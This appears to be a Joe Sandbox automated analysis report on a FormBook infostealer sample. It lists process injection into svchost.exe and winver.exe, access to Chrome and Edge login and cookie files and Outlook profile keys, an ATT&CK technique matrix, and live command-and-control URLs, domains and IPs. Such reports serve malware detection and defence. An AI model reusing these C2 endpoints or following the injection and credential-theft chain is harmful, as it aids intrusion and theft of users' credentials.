                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread register set: target process: 5920Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeThread APC queued: target process: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EED008Jump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003B87B1 LogonUserW,0_2_003B87B1
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00363B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00363B3A
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003648D7
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C4C27 mouse_event,0_2_003C4C27
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\aBEh0fsi2c.exe"Jump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003B7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003B7CAF
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003B874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003B874B
                Source: aBEh0fsi2c.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: aBEh0fsi2c.exe, XWDsAjkFcK.exe, 00000004.00000000.1594270788.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555496782.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1744282619.00000000014E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: XWDsAjkFcK.exe, 00000004.00000000.1594270788.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555496782.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1744282619.00000000014E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: XWDsAjkFcK.exe, 00000004.00000000.1594270788.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555496782.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1744282619.00000000014E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: XWDsAjkFcK.exe, 00000004.00000000.1594270788.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555496782.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1744282619.00000000014E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0038862B cpuid 0_2_0038862B
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00394E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00394E87
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003A1E06 GetUserNameW,0_2_003A1E06
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00393F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00393F3A
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003649A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: aBEh0fsi2c.exeBinary or memory string: WIN_81
                Source: aBEh0fsi2c.exeBinary or memory string: WIN_XP
                Source: aBEh0fsi2c.exeBinary or memory string: WIN_XPe
                Source: aBEh0fsi2c.exeBinary or memory string: WIN_VISTA
                Source: aBEh0fsi2c.exeBinary or memory string: WIN_7
                Source: aBEh0fsi2c.exeBinary or memory string: WIN_8
                Source: aBEh0fsi2c.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003D6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_003D6283
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003D6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003D6747
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00397AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,0_2_00397AA1
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                2
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588004 Sample: aBEh0fsi2c.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.rtpterbaruwaktu3.xyz 2->28 30 www.fortevision.xyz 2->30 32 9 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 4 other signatures 2->50 10 aBEh0fsi2c.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 XWDsAjkFcK.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 winver.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 XWDsAjkFcK.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 bpgroup.site 74.48.143.82, 49980, 49981, 49982 TELUS-3CA Canada 22->34 36 rtpterbaruwaktu3.xyz 103.21.221.87, 49988, 49989, 49990 LINKNET-ID-APLinknetASNID unknown 22->36 38 3 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                aBEh0fsi2c.exe32%VirustotalBrowse
                aBEh0fsi2c.exe76%ReversingLabsWin32.Trojan.AutoitInject
                aBEh0fsi2c.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.fortevision.xyz/dash/0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/mv7p/0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/?KzB47nV=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+dJXjaTCQaUtQq1o15v4dK3n1/iEQ==&ity41=G4jxKXr0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/mv7p/?KzB47nV=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJqQPM7lgRIPKEXKG9BUPo7IhW8nQqw==&ity41=G4jxKXr0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/?KzB47nV=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspxWYm91P5vgQDerxUIIQwwTsV+rYA==&ity41=G4jxKXr0%Avira URL Cloudsafe
                http://www.jijievo.site/z9pi/?KzB47nV=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglwHgduUeSBeuMCINCfMt0kyQ8gS8A==&ity41=G4jxKXr0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/0%Avira URL Cloudsafe
                http://www.fortevision.xyz/dash/?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg==0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                all.wjscdn.com
                154.90.58.209
                truetrue
                  unknown
                  ymx01.cn
                  8.218.14.120
                  truetrue
                    unknown
                    bpgroup.site
                    74.48.143.82
                    truetrue
                      unknown
                      www.ytsd88.top
                      47.76.213.197
                      truefalse
                        high
                        www.fortevision.xyz
                        13.248.169.48
                        truetrue
                          unknown
                          rtpterbaruwaktu3.xyz
                          103.21.221.87
                          truetrue
                            unknown
                            www.bpgroup.site
                            unknown
                            unknownfalse
                              unknown
                              www.rtpterbaruwaktu3.xyz
                              unknown
                              unknowntrue
                                unknown
                                www.grandesofertas.fun
                                unknown
                                unknownfalse
                                  unknown
                                  www.jijievo.site
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.prhmcjdz.tokyo
                                    unknown
                                    unknownfalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.rtpterbaruwaktu3.xyz/mv7p/?KzB47nV=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJqQPM7lgRIPKEXKG9BUPo7IhW8nQqw==&ity41=G4jxKXrtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.bpgroup.site/mlxg/?KzB47nV=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+dJXjaTCQaUtQq1o15v4dK3n1/iEQ==&ity41=G4jxKXrtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fortevision.xyz/dash/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.rtpterbaruwaktu3.xyz/mv7p/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.bpgroup.site/mlxg/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.ytsd88.top/8qt7/?KzB47nV=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspxWYm91P5vgQDerxUIIQwwTsV+rYA==&ity41=G4jxKXrtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.ytsd88.top/8qt7/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jijievo.site/z9pi/?KzB47nV=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglwHgduUeSBeuMCINCfMt0kyQ8gS8A==&ity41=G4jxKXrtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fortevision.xyz/dash/?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg==true
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabwinver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.rtpterbaruwaktu3.xyzXWDsAjkFcK.exe, 00000006.00000002.2560990702.00000000053A3000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.bt.cn/?from=404winver.exe, 00000005.00000002.2560762687.0000000005888000.00000004.10000000.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000002.2559116718.0000000003608000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    high
                                                    https://www.ecosia.org/newtab/winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        13.248.169.48
                                                        www.fortevision.xyzUnited States
                                                        16509AMAZON-02UStrue
                                                        103.21.221.87
                                                        rtpterbaruwaktu3.xyzunknown
                                                        9905LINKNET-ID-APLinknetASNIDtrue
                                                        47.76.213.197
                                                        www.ytsd88.topUnited States
                                                        9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                        154.90.58.209
                                                        all.wjscdn.comSeychelles
                                                        40065CNSERVERSUStrue
                                                        74.48.143.82
                                                        bpgroup.siteCanada
                                                        14663TELUS-3CAtrue
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1588004
                                                        Start date and time:2025-01-10 20:25:14 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 2s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:10
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:aBEh0fsi2c.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:9351f03cc5e661bf7eb9e279c67c11f05ea78c2cc6c283691218ab43c3e15a06.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/3@7/5
                                                        EGA Information:
                                                        • Successful, ratio: 66.7%
                                                        HCA Information:
                                                        • Successful, ratio: 85%
                                                        • Number of executed functions: 52
                                                        • Number of non-executed functions: 277
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        TimeTypeDescription
                                                        14:27:22API Interceptor1361567x Sleep call for process: winver.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        13.248.169.48EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                        • www.sfantulandrei.info/wvsm/
                                                        bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                        • www.108.foundation/lnu5/
                                                        OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                        • www.tals.xyz/h8xm/
                                                        QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                        • www.hsa.world/09b7/
                                                        cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                        • www.bcg.services/5onp/
                                                        3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                        • www.shipley.group/5g1j/
                                                        KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                        • www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
                                                        TU0kiz3mxz.exeGet hashmaliciousFormBookBrowse
                                                        • www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
                                                        QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                        • www.bonheur.tech/t3iv/
                                                        QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                        • www.bonheur.tech/t3iv/
                                                        103.21.221.87CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • www.rtpterbaruwaktu3.xyz/mv7p/
                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • www.rtpterbaruwaktu3.xyz/mv7p/
                                                        P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                        • www.rtpterbaruwaktu3.xyz/v6un/
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ymx01.cnZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 8.210.46.21
                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • 8.210.46.21
                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • 8.210.46.21
                                                        www.fortevision.xyzCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                        • 13.248.169.48
                                                        all.wjscdn.comORDER-401.exeGet hashmaliciousFormBookBrowse
                                                        • 154.205.159.116
                                                        01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                        • 154.90.58.209
                                                        DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                        • 154.90.58.209
                                                        New Order.exeGet hashmaliciousFormBookBrowse
                                                        • 154.90.35.240
                                                        TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                        • 38.54.112.227
                                                        Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                        • 154.205.159.116
